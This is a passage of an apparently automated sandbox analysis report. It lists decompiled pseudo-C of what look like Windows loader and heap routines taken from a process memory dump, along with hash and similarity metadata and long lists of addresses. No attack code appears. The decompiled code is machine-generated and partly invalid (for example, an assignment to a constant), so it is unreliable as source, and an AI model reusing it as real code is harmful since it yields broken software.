                        						__eflags = _t139 - 1;
                        						if(__eflags != 0) {
                        							_t200 = 0xc;
                        							_t201 = _t237 - 0x40;
                        							_t141 = E02B2F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
                        							 *(_t237 - 0x44) = _t141;
                        							__eflags = _t141;
                        							if(_t141 < 0) {
                        								L50:
                        								E02B0FFB0(_t193, _t235, 0x2be8550);
                        								L5:
                        								return E02B4D130(_t193, _t235, _t236);
                        							}
                        							_push(_t201);
                        							_t221 = 0x10;
                        							_t202 =  *(_t237 - 0x40);
                        							_t145 = E02AF1C45( *(_t237 - 0x40), _t221);
                        							 *(_t237 - 0x44) = _t145;
                        							__eflags = _t145;
                        							if(_t145 < 0) {
                        								goto L50;
                        							}
                        							_t146 =  *0x2be7b9c; // 0x0
                        							_t235 = L02B14620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
                        							 *(_t237 - 0x60) = _t235;
                        							__eflags = _t235;
                        							if(_t235 == 0) {
                        								_t149 = 0xc0000017;
                        								 *(_t237 - 0x44) = 0xc0000017;
                        							} else {
                        								_t149 =  *(_t237 - 0x44);
                        							}
                        							__eflags = _t149;
                        							if(__eflags >= 0) {
                        								L8:
                        								 *(_t237 - 0x64) = _t235;
                        								_t150 =  *0x2be7b10; // 0x8
                        								 *(_t237 - 0x4c) = _t150;
                        								_push(_t237 - 0x74);
                        								_push(_t237 - 0x39);
                        								_push(_t237 - 0x58);
                        								_t193 = E02B2A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
                        								 *(_t237 - 0x44) = _t193;
                        								__eflags = _t193;
                        								if(_t193 < 0) {
                        									L30:
                        									E02B0FFB0(_t193, _t235, 0x2be8550);
                        									__eflags = _t235 - _t237 - 0x38;
                        									if(_t235 != _t237 - 0x38) {
                        										_t235 =  *(_t237 - 0x48);
                        										L02B177F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
                        									} else {
                        										_t235 =  *(_t237 - 0x48);
                        									}
                        									__eflags =  *(_t237 - 0x6c);
                        									if( *(_t237 - 0x6c) != 0) {
                        										L02B177F0(_t235, _t236,  *(_t237 - 0x6c));
                        									}
                        									__eflags = _t193;
                        									if(_t193 >= 0) {
                        										goto L4;
                        									} else {
                        										goto L5;
                        									}
                        								}
                        								_t204 =  *0x2be7b04; // 0x1
                        								 *(_t235 + 8) = _t204;
                        								__eflags =  *((char*)(_t237 - 0x39));
                        								if( *((char*)(_t237 - 0x39)) != 0) {
                        									 *(_t235 + 4) = 1;
                        									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
                        									_t161 =  *0x2be7b10; // 0x8
                        									 *(_t237 - 0x4c) = _t161;
                        								} else {
                        									 *(_t235 + 4) = _t236;
                        									 *(_t235 + 0xc) =  *(_t237 - 0x58);
                        								}
                        								 *((intOrPtr*)(_t237 - 0x54)) = E02B337C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
                        								_t224 = _t236;
                        								 *(_t237 - 0x40) = _t236;
                        								 *(_t237 - 0x50) = _t236;
                        								while(1) {
                        									_t163 =  *(_t235 + 8);
                        									__eflags = _t224 - _t163;
                        									if(_t224 >= _t163) {
                        										break;
                        									}
                        									_t228 =  *0x2be7b9c; // 0x0
                        									_t214 = L02B14620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
                        									 *(_t237 - 0x78) = _t214;
                        									__eflags = _t214;
                        									if(_t214 == 0) {
                        										L52:
                        										_t193 = 0xc0000017;
                        										L19:
                        										 *(_t237 - 0x44) = _t193;
                        										L20:
                        										_t206 =  *(_t237 - 0x40);
                        										__eflags = _t206;
                        										if(_t206 == 0) {
                        											L26:
                        											__eflags = _t193;
                        											if(_t193 < 0) {
                        												E02B337F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
                        												__eflags =  *((char*)(_t237 - 0x39));
                        												if( *((char*)(_t237 - 0x39)) != 0) {
                        													 *0x2be7b10 =  *0x2be7b10 - 8;
                        												}
                        											} else {
                        												_t169 =  *(_t237 - 0x68);
                        												__eflags = _t169;
                        												if(_t169 != 0) {
                        													 *0x2be7b04 =  *0x2be7b04 - _t169;
                        												}
                        											}
                        											__eflags = _t193;
                        											if(_t193 >= 0) {
                        												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
                        											}
                        											goto L30;
                        										}
                        										_t226 = _t206 * 0xc;
                        										__eflags = _t226;
                        										_t194 =  *(_t237 - 0x48);
                        										do {
                        											 *(_t237 - 0x40) = _t206 - 1;
                        											_t226 = _t226 - 0xc;
                        											 *(_t237 - 0x4c) = _t226;
                        											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
                        											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
                        												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
                        												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
                        													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
                        													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                        													__eflags =  *((char*)(_t237 - 0x39));
                        													if( *((char*)(_t237 - 0x39)) == 0) {
                        														_t171 = _t210;
                        													} else {
                        														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
                        														L02B177F0(_t194, _t236, _t210 - 8);
                        														_t171 =  *(_t237 - 0x50);
                        													}
                        													L48:
                        													L02B177F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
                        													L46:
                        													_t206 =  *(_t237 - 0x40);
                        													_t226 =  *(_t237 - 0x4c);
                        													goto L24;
                        												}
                        												 *0x2be7b08 =  *0x2be7b08 + 1;
                        												goto L24;
                        											}
                        											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                        											__eflags = _t171;
                        											if(_t171 != 0) {
                        												__eflags =  *((char*)(_t237 - 0x39));
                        												if( *((char*)(_t237 - 0x39)) == 0) {
                        													goto L48;
                        												}
                        												E02B357C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
                        												goto L46;
                        											}
                        											L24:
                        											__eflags = _t206;
                        										} while (_t206 != 0);
                        										_t193 =  *(_t237 - 0x44);
                        										goto L26;
                        									}
                        									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
                        									 *(_t237 - 0x7c) = _t232;
                        									 *(_t232 - 4) = _t214;
                        									 *(_t237 - 4) = _t236;
                        									E02B3F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
                        									_t238 = _t238 + 0xc;
                        									 *(_t237 - 4) = 0xfffffffe;
                        									_t215 =  *(_t237 - 0x48);
                        									__eflags = _t193;
                        									if(_t193 < 0) {
                        										L02B177F0(_t215, _t236,  *(_t237 - 0x78));
                        										goto L20;
                        									}
                        									__eflags =  *((char*)(_t237 - 0x39));
                        									if( *((char*)(_t237 - 0x39)) != 0) {
                        										_t233 = E02B2A44B( *(_t237 - 0x4c));
                        										 *(_t237 - 0x50) = _t233;
                        										__eflags = _t233;
                        										if(_t233 == 0) {
                        											L02B177F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
                        											goto L52;
                        										}
                        										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
                        										L17:
                        										_t234 =  *(_t237 - 0x40);
                        										_t218 = _t234 * 0xc;
                        										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
                        										 *(_t218 + _t235 + 0x10) = _t236;
                        										_t224 = _t234 + 1;
                        										 *(_t237 - 0x40) = _t224;
                        										 *(_t237 - 0x50) = _t224;
                        										_t193 =  *(_t237 - 0x44);
                        										continue;
                        									}
                        									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
                        									goto L17;
                        								}
                        								 *_t235 = _t236;
                        								_t165 = 0x10 + _t163 * 0xc;
                        								__eflags = _t165;
                        								_push(_t165);
                        								_push(_t235);
                        								_push(0x23);
                        								_push(0xffffffff);
                        								_t193 = E02B396C0();
                        								goto L19;
                        							} else {
                        								goto L50;
                        							}
                        						}
                        						_t235 = _t237 - 0x38;
                        						 *(_t237 - 0x60) = _t235;
                        						goto L8;
                        					}
                        					goto L4;
                        				}
                        			}

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 929679a730e2bdee85a1b7f742545644c5d075edbbba3832680d5017625227f9
                        • Instruction ID: fa6c743c55710fd5be08ab609391bec0c578a955583ba46a167d26e17b982890
                        • Opcode Fuzzy Hash: 929679a730e2bdee85a1b7f742545644c5d075edbbba3832680d5017625227f9
                        • Instruction Fuzzy Hash: C8B15970E00659DFDB16DFE8C9C0AADBBB6FF48304F1441A9E415AB295DB70AA41CF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 67%
                        			E02B2513A(intOrPtr __ecx, void* __edx) {
                        				signed int _v8;
                        				signed char _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				char _v28;
                        				signed int _v32;
                        				signed int _v36;
                        				signed int _v40;
                        				intOrPtr _v44;
                        				intOrPtr _v48;
                        				char _v63;
                        				char _v64;
                        				signed int _v72;
                        				signed int _v76;
                        				signed int _v80;
                        				signed int _v84;
                        				signed int _v88;
                        				signed char* _v92;
                        				signed int _v100;
                        				signed int _v104;
                        				char _v105;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* _t157;
                        				signed int _t159;
                        				signed int _t160;
                        				unsigned int* _t161;
                        				intOrPtr _t165;
                        				signed int _t172;
                        				signed char* _t181;
                        				intOrPtr _t189;
                        				intOrPtr* _t200;
                        				signed int _t202;
                        				signed int _t203;
                        				char _t204;
                        				signed int _t207;
                        				signed int _t208;
                        				void* _t209;
                        				intOrPtr _t210;
                        				signed int _t212;
                        				signed int _t214;
                        				signed int _t221;
                        				signed int _t222;
                        				signed int _t226;
                        				intOrPtr* _t232;
                        				signed int _t233;
                        				signed int _t234;
                        				intOrPtr _t237;
                        				intOrPtr _t238;
                        				intOrPtr _t240;
                        				void* _t245;
                        				signed int _t246;
                        				signed int _t247;
                        				void* _t248;
                        				void* _t251;
                        				void* _t252;
                        				signed int _t253;
                        				signed int _t255;
                        				signed int _t256;
                        
                        				_t255 = (_t253 & 0xfffffff8) - 0x6c;
                        				_v8 =  *0x2bed360 ^ _t255;
                        				_v32 = _v32 & 0x00000000;
                        				_t251 = __edx;
                        				_t237 = __ecx;
                        				_t212 = 6;
                        				_t245 =  &_v84;
                        				_t207 =  *((intOrPtr*)(__ecx + 0x48));
                        				_v44 =  *((intOrPtr*)(__edx + 0xc8));
                        				_v48 = __ecx;
                        				_v36 = _t207;
                        				_t157 = memset(_t245, 0, _t212 << 2);
                        				_t256 = _t255 + 0xc;
                        				_t246 = _t245 + _t212;
                        				if(_t207 == 2) {
                        					_t247 =  *(_t237 + 0x60);
                        					_t208 =  *(_t237 + 0x64);
                        					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
                        					_t159 =  *((intOrPtr*)(_t237 + 0x58));
                        					_v104 = _t159;
                        					_v76 = _t159;
                        					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
                        					_v100 = _t160;
                        					_v72 = _t160;
                        					L19:
                        					_v80 = _t208;
                        					_v84 = _t247;
                        					L8:
                        					_t214 = 0;
                        					if( *(_t237 + 0x74) > 0) {
                        						_t82 = _t237 + 0x84; // 0x124
                        						_t161 = _t82;
                        						_v92 = _t161;
                        						while( *_t161 >> 0x1f != 0) {
                        							_t200 = _v92;
                        							if( *_t200 == 0x80000000) {
                        								break;
                        							}
                        							_t214 = _t214 + 1;
                        							_t161 = _t200 + 0x10;
                        							_v92 = _t161;
                        							if(_t214 <  *(_t237 + 0x74)) {
                        								continue;
                        							}
                        							goto L9;
                        						}
                        						_v88 = _t214 << 4;
                        						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
                        						_t165 = 0;
                        						asm("adc eax, [ecx+edx+0x7c]");
                        						_v24 = _t165;
                        						_v28 = _v40;
                        						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
                        						_t221 = _v40;
                        						_v16 =  *_v92;
                        						_v32 =  &_v28;
                        						if( *(_t237 + 0x4e) >> 0xf == 0) {
                        							goto L9;
                        						}
                        						_t240 = _v48;
                        						if( *_v92 != 0x80000000) {
                        							goto L9;
                        						}
                        						 *((intOrPtr*)(_t221 + 8)) = 0;
                        						 *((intOrPtr*)(_t221 + 0xc)) = 0;
                        						 *((intOrPtr*)(_t221 + 0x14)) = 0;
                        						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
                        						_t226 = 0;
                        						_t181 = _t251 + 0x66;
                        						_v88 = 0;
                        						_v92 = _t181;
                        						do {
                        							if( *((char*)(_t181 - 2)) == 0) {
                        								goto L31;
                        							}
                        							_t226 = _v88;
                        							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
                        								_t181 = E02B3D0F0(1, _t226 + 0x20, 0);
                        								_t226 = _v40;
                        								 *(_t226 + 8) = _t181;
                        								 *((intOrPtr*)(_t226 + 0xc)) = 0;
                        								L34:
                        								if(_v44 == 0) {
                        									goto L9;
                        								}
                        								_t210 = _v44;
                        								_t127 = _t210 + 0x1c; // 0x1c
                        								_t249 = _t127;
                        								E02B12280(_t181, _t127);
                        								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
                        								_t185 =  *((intOrPtr*)(_t210 + 0x94));
                        								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
                        									L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
                        								}
                        								_t189 = L02B14620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
                        								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
                        								if(_t189 != 0) {
                        									 *((intOrPtr*)(_t189 + 8)) = _v20;
                        									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
                        									_t232 =  *((intOrPtr*)(_t210 + 0x94));
                        									 *_t232 = _t232 + 0x10;
                        									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
                        									E02B3F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
                        									_t256 = _t256 + 0xc;
                        								}
                        								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
                        								E02B0FFB0(_t210, _t249, _t249);
                        								_t222 = _v76;
                        								_t172 = _v80;
                        								_t208 = _v84;
                        								_t247 = _v88;
                        								L10:
                        								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
                        								_v44 = _t238;
                        								if(_t238 != 0) {
                        									 *0x2beb1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
                        									_v44();
                        								}
                        								_pop(_t248);
                        								_pop(_t252);
                        								_pop(_t209);
                        								return E02B3B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
                        							}
                        							_t181 = _v92;
                        							L31:
                        							_t226 = _t226 + 1;
                        							_t181 =  &(_t181[0x18]);
                        							_v88 = _t226;
                        							_v92 = _t181;
                        						} while (_t226 < 4);
                        						goto L34;
                        					}
                        					L9:
                        					_t172 = _v104;
                        					_t222 = _v100;
                        					goto L10;
                        				}
                        				_t247 = _t246 | 0xffffffff;
                        				_t208 = _t247;
                        				_v84 = _t247;
                        				_v80 = _t208;
                        				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
                        					_t233 = _v72;
                        					_v105 = _v64;
                        					_t202 = _v76;
                        				} else {
                        					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
                        					_v105 = 1;
                        					if(_v63 <= _t204) {
                        						_v63 = _t204;
                        					}
                        					_t202 = _v76 |  *(_t251 + 0x40);
                        					_t233 = _v72 |  *(_t251 + 0x44);
                        					_t247 =  *(_t251 + 0x38);
                        					_t208 =  *(_t251 + 0x3c);
                        					_v76 = _t202;
                        					_v72 = _t233;
                        					_v84 = _t247;
                        					_v80 = _t208;
                        				}
                        				_v104 = _t202;
                        				_v100 = _t233;
                        				if( *((char*)(_t251 + 0xc4)) != 0) {
                        					_t237 = _v48;
                        					_v105 = 1;
                        					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
                        						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
                        						_t237 = _v48;
                        					}
                        					_t203 = _t202 |  *(_t251 + 0xb8);
                        					_t234 = _t233 |  *(_t251 + 0xbc);
                        					_t247 = _t247 &  *(_t251 + 0xb0);
                        					_t208 = _t208 &  *(_t251 + 0xb4);
                        					_v104 = _t203;
                        					_v76 = _t203;
                        					_v100 = _t234;
                        					_v72 = _t234;
                        					_v84 = _t247;
                        					_v80 = _t208;
                        				}
                        				if(_v105 == 0) {
                        					_v36 = _v36 & 0x00000000;
                        					_t208 = 0;
                        					_t247 = 0;
                        					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
                        					goto L19;
                        				} else {
                        					_v36 = 1;
                        					goto L8;
                        				}
                        			}

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: edec05448a02846dedbc41605eb430415c585ed3ae1c00bd2f1b42c4ce5ab1cd
                        • Instruction ID: b33dcbc18fb804b97c2de69d4a66f62499b3020cd6623c61ef3f29e1038017ec
                        • Opcode Fuzzy Hash: edec05448a02846dedbc41605eb430415c585ed3ae1c00bd2f1b42c4ce5ab1cd
                        • Instruction Fuzzy Hash: 5CC111755093808FD364CF28C580A6AFBE1FF88308F1449AEF8998B352D775E945CB52
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 74%
                        			E02B203E2(signed int __ecx, signed int __edx) {
                        				signed int _v8;
                        				signed int _v12;
                        				signed int _v16;
                        				signed int _v20;
                        				signed int _v24;
                        				signed int _v28;
                        				signed int _v32;
                        				signed int _v36;
                        				intOrPtr _v40;
                        				signed int _v44;
                        				signed int _v48;
                        				char _v52;
                        				char _v56;
                        				char _v64;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed int _t56;
                        				signed int _t58;
                        				char* _t64;
                        				intOrPtr _t65;
                        				signed int _t74;
                        				signed int _t79;
                        				char* _t83;
                        				intOrPtr _t84;
                        				signed int _t93;
                        				signed int _t94;
                        				signed char* _t95;
                        				signed int _t99;
                        				signed int _t100;
                        				signed char* _t101;
                        				signed int _t105;
                        				signed int _t119;
                        				signed int _t120;
                        				void* _t122;
                        				signed int _t123;
                        				signed int _t127;
                        
                        				_v8 =  *0x2bed360 ^ _t127;
                        				_t119 = __ecx;
                        				_t105 = __edx;
                        				_t118 = 0;
                        				_v20 = __edx;
                        				_t120 =  *(__ecx + 0x20);
                        				if(E02B20548(__ecx, 0) != 0) {
                        					_t56 = 0xc000022d;
                        					L23:
                        					return E02B3B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
                        				} else {
                        					_v12 = _v12 | 0xffffffff;
                        					_t58 = _t120 + 0x24;
                        					_t109 =  *(_t120 + 0x18);
                        					_t118 = _t58;
                        					_v16 = _t58;
                        					E02B0B02A( *(_t120 + 0x18), _t118, 0x14a5);
                        					_v52 = 0x18;
                        					_v48 = 0;
                        					0x840 = 0x40;
                        					if( *0x2be7c1c != 0) {
                        					}
                        					_v40 = 0x840;
                        					_v44 = _t105;
                        					_v36 = 0;
                        					_v32 = 0;
                        					if(E02B17D50() != 0) {
                        						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        					} else {
                        						_t64 = 0x7ffe0384;
                        					}
                        					if( *_t64 != 0) {
                        						_t65 =  *[fs:0x30];
                        						__eflags =  *(_t65 + 0x240) & 0x00000004;
                        						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
                        							_t100 = E02B17D50();
                        							__eflags = _t100;
                        							if(_t100 == 0) {
                        								_t101 = 0x7ffe0385;
                        							} else {
                        								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                        							}
                        							__eflags =  *_t101 & 0x00000020;
                        							if(( *_t101 & 0x00000020) != 0) {
                        								_t118 = _t118 | 0xffffffff;
                        								_t109 = 0x1485;
                        								E02B77016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
                        							}
                        						}
                        					}
                        					_t105 = 0;
                        					while(1) {
                        						_push(0x60);
                        						_push(5);
                        						_push( &_v64);
                        						_push( &_v52);
                        						_push(0x100021);
                        						_push( &_v12);
                        						_t122 = E02B39830();
                        						if(_t122 >= 0) {
                        							break;
                        						}
                        						__eflags = _t122 - 0xc0000034;
                        						if(_t122 == 0xc0000034) {
                        							L38:
                        							_t120 = 0xc0000135;
                        							break;
                        						}
                        						__eflags = _t122 - 0xc000003a;
                        						if(_t122 == 0xc000003a) {
                        							goto L38;
                        						}
                        						__eflags = _t122 - 0xc0000022;
                        						if(_t122 != 0xc0000022) {
                        							break;
                        						}
                        						__eflags = _t105;
                        						if(__eflags != 0) {
                        							break;
                        						}
                        						_t109 = _t119;
                        						_t99 = E02B769A6(_t119, __eflags);
                        						__eflags = _t99;
                        						if(_t99 == 0) {
                        							break;
                        						}
                        						_t105 = _t105 + 1;
                        					}
                        					if( !_t120 >= 0) {
                        						L22:
                        						_t56 = _t120;
                        						goto L23;
                        					}
                        					if( *0x2be7c04 != 0) {
                        						_t118 = _v12;
                        						_t120 = E02B7A7AC(_t119, _t118, _t109);
                        						__eflags = _t120;
                        						if(_t120 >= 0) {
                        							goto L10;
                        						}
                        						__eflags =  *0x2be7bd8;
                        						if( *0x2be7bd8 != 0) {
                        							L20:
                        							if(_v12 != 0xffffffff) {
                        								_push(_v12);
                        								E02B395D0();
                        							}
                        							goto L22;
                        						}
                        					}
                        					L10:
                        					_push(_v12);
                        					_t105 = _t119 + 0xc;
                        					_push(0x1000000);
                        					_push(0x10);
                        					_push(0);
                        					_push(0);
                        					_push(0xf);
                        					_push(_t105);
                        					_t120 = E02B399A0();
                        					if(_t120 < 0) {
                        						__eflags = _t120 - 0xc000047e;
                        						if(_t120 == 0xc000047e) {
                        							L51:
                        							_t74 = E02B73540(_t120);
                        							_t119 = _v16;
                        							_t120 = _t74;
                        							L52:
                        							_t118 = 0x1485;
                        							E02AFB1E1(_t120, 0x1485, 0, _t119);
                        							goto L20;
                        						}
                        						__eflags = _t120 - 0xc000047f;
                        						if(_t120 == 0xc000047f) {
                        							goto L51;
                        						}
                        						__eflags = _t120 - 0xc0000462;
                        						if(_t120 == 0xc0000462) {
                        							goto L51;
                        						}
                        						_t119 = _v16;
                        						__eflags = _t120 - 0xc0000017;
                        						if(_t120 != 0xc0000017) {
                        							__eflags = _t120 - 0xc000009a;
                        							if(_t120 != 0xc000009a) {
                        								__eflags = _t120 - 0xc000012d;
                        								if(_t120 != 0xc000012d) {
                        									_v28 = _t119;
                        									_push( &_v56);
                        									_push(1);
                        									_v24 = _t120;
                        									_push( &_v28);
                        									_push(1);
                        									_push(2);
                        									_push(0xc000007b);
                        									_t79 = E02B3AAF0();
                        									__eflags = _t79;
                        									if(_t79 >= 0) {
                        										__eflags =  *0x2be8474 - 3;
                        										if( *0x2be8474 != 3) {
                        											 *0x2be79dc =  *0x2be79dc + 1;
                        										}
                        									}
                        								}
                        							}
                        						}
                        						goto L52;
                        					}
                        					if(E02B17D50() != 0) {
                        						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        					} else {
                        						_t83 = 0x7ffe0384;
                        					}
                        					if( *_t83 != 0) {
                        						_t84 =  *[fs:0x30];
                        						__eflags =  *(_t84 + 0x240) & 0x00000004;
                        						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
                        							_t94 = E02B17D50();
                        							__eflags = _t94;
                        							if(_t94 == 0) {
                        								_t95 = 0x7ffe0385;
                        							} else {
                        								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                        							}
                        							__eflags =  *_t95 & 0x00000020;
                        							if(( *_t95 & 0x00000020) != 0) {
                        								E02B77016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
                        							}
                        						}
                        					}
                        					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
                        						if( *0x2be8708 != 0) {
                        							_t118 =  *0x7ffe0330;
                        							_t123 =  *0x2be7b00; // 0x0
                        							asm("ror esi, cl");
                        							 *0x2beb1e0(_v12, _v20, 0x20);
                        							_t93 =  *(_t123 ^  *0x7ffe0330)();
                        							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
                        							asm("sbb esi, esi");
                        							_t120 =  ~_t50 & _t93;
                        						} else {
                        							_t120 = 0;
                        						}
                        					}
                        					if( !_t120 >= 0) {
                        						L19:
                        						_push( *_t105);
                        						E02B395D0();
                        						 *_t105 =  *_t105 & 0x00000000;
                        						goto L20;
                        					}
                        					_t120 = E02B07F65(_t119);
                        					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
                        						__eflags = _t120;
                        						if(_t120 < 0) {
                        							goto L19;
                        						}
                        						 *(_t119 + 0x64) = _v12;
                        						goto L22;
                        					}
                        					goto L19;
                        				}
                        			}

                        0x00000000
                        0x02b64d22
                        0x02b64cf1
                        0x02b64cf7
                        0x00000000
                        0x00000000
                        0x02b64cf9
                        0x02b64cff
                        0x00000000
                        0x00000000
                        0x02b64d05
                        0x02b64d07
                        0x00000000
                        0x00000000
                        0x02b64d0d
                        0x02b64d0f
                        0x02b64d14
                        0x02b64d16
                        0x00000000
                        0x00000000
                        0x02b64d1c
                        0x02b64d1c
                        0x02b20499
                        0x02b20535
                        0x02b20535
                        0x00000000
                        0x02b20535
                        0x02b204a6
                        0x02b64d2c
                        0x02b64d37
                        0x02b64d39
                        0x02b64d3b
                        0x00000000
                        0x00000000
                        0x02b64d41
                        0x02b64d48
                        0x02b20527
                        0x02b2052b
                        0x02b2052d
                        0x02b20530
                        0x02b20530
                        0x00000000
                        0x02b2052b
                        0x02b64d4e
                        0x02b204ac
                        0x02b204ac
                        0x02b204af
                        0x02b204b2
                        0x02b204b7
                        0x02b204b9
                        0x02b204bb
                        0x02b204bd
                        0x02b204bf
                        0x02b204c5
                        0x02b204c9
                        0x02b64d53
                        0x02b64d59
                        0x02b64db9
                        0x02b64dba
                        0x02b64dbf
                        0x02b64dc2
                        0x02b64dc4
                        0x02b64dc7
                        0x02b64dce
                        0x00000000
                        0x02b64dce
                        0x02b64d5b
                        0x02b64d61
                        0x00000000
                        0x00000000
                        0x02b64d63
                        0x02b64d69
                        0x00000000
                        0x00000000
                        0x02b64d6b
                        0x02b64d6e
                        0x02b64d74
                        0x02b64d76
                        0x02b64d7c
                        0x02b64d7e
                        0x02b64d84
                        0x02b64d89
                        0x02b64d8c
                        0x02b64d8d
                        0x02b64d92
                        0x02b64d95
                        0x02b64d96
                        0x02b64d98
                        0x02b64d9a
                        0x02b64d9f
                        0x02b64da4
                        0x02b64da6
                        0x02b64da8
                        0x02b64daf
                        0x02b64db1
                        0x02b64db1
                        0x02b64daf
                        0x02b64da6
                        0x02b64d84
                        0x02b64d7c
                        0x00000000
                        0x02b64d74
                        0x02b204d6
                        0x02b64de1
                        0x02b204dc
                        0x02b204dc
                        0x02b204dc
                        0x02b204e4
                        0x02b64deb
                        0x02b64df1
                        0x02b64df8
                        0x02b64dfe
                        0x02b64e03
                        0x02b64e05
                        0x02b64e17
                        0x02b64e07
                        0x02b64e10
                        0x02b64e10
                        0x02b64e1c
                        0x02b64e1f
                        0x02b64e35
                        0x02b64e35
                        0x02b64e1f
                        0x02b64df8
                        0x02b204f1
                        0x02b204fa
                        0x02b64e3f
                        0x02b64e47
                        0x02b64e5b
                        0x02b64e61
                        0x02b64e67
                        0x02b64e69
                        0x02b64e71
                        0x02b64e73
                        0x02b20500
                        0x02b20500
                        0x02b20500
                        0x02b204fa
                        0x02b20508
                        0x02b2051d
                        0x02b2051d
                        0x02b2051f
                        0x02b20524
                        0x00000000
                        0x02b20524
                        0x02b20515
                        0x02b20517
                        0x02b64e7a
                        0x02b64e7c
                        0x00000000
                        0x00000000
                        0x02b64e85
                        0x00000000
                        0x02b64e85
                        0x00000000
                        0x02b20517

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8131fbe01d4d6c0bb6ac55b20697b6cad176bec15f826509642216ea4eef6be3
                        • Instruction ID: b713a3062db0fecfe6915d46cc383189b86492a12f7690ba9290d1398ea44647
